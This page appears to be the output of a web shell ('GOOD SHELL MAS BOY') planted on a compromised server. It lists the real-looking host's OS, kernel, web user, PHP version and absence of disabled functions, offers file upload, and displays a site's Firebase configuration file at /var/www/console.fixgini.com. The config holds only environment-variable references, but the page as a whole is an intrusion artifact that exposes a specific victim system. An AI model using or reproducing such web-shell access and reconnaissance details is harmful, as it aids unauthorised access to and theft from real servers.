GOOD SHELL MAS BOY
Server: Apache/2.4.52 (Ubuntu)
System: Linux vmi1836763.contaboserver.net 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
User: www-data (33)
PHP: 8.4.10
Disabled: NONE
Upload Files
File: /var/www/console.fixgini.com/config/firebase.php
<?php

return [
    /*
     * --------------------------------------------------------------
     * Your Firebase credentials
     * --------------------------------------------------------------
     *
     * The file path of the Service Account credentials JSON file.
     */
    'credentials' => env('FIREBASE_CREDENTIALS'),

    'firestore' => env('FIRESTORE_BASE_URL'),

    /*
     * --------------------------------------------------------------
     * Firebase Database URL
     * --------------------------------------------------------------
     *
     * The URL of your Firebase Realtime Database.
     */
    'database' => env('FIREBASE_DATABASE_URL'),

    /*
     * --------------------------------------------------------------
     * Firebase Dynamic Links domain
     * --------------------------------------------------------------
     *
     * The domain configured for Firebase Dynamic Links.
     */
    'dynamic_links_domain' => env('FIREBASE_DYNAMIC_LINKS_DOMAIN'),

    /*
     * --------------------------------------------------------------
     * Firebase Storage Bucket
     * --------------------------------------------------------------
     *
     * The default storage bucket for Firebase Storage.
     */
    'storage_bucket' => env('FIREBASE_STORAGE_BUCKET'),

    /*
     * --------------------------------------------------------------
     * Default options
     * --------------------------------------------------------------
     *
     * Default options to use with each Firebase client.
     */
    'options' => [
        // 'databaseAuthVariableOverride' => ['uid' => 'my-service-worker'],
    ],
];